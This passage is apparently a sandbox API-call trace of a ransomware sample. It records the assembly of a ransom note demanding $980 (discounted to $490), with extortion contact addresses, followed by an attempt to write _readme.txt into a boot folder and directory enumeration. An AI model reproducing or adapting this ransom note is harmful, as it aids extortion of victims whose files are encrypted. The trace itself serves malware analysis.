hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.638] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.638] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.640] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*" (normalized: "c:\\boot\\de-de\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.658] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.658] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.658] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.658] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.659] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.693] RtlAllocateHeap 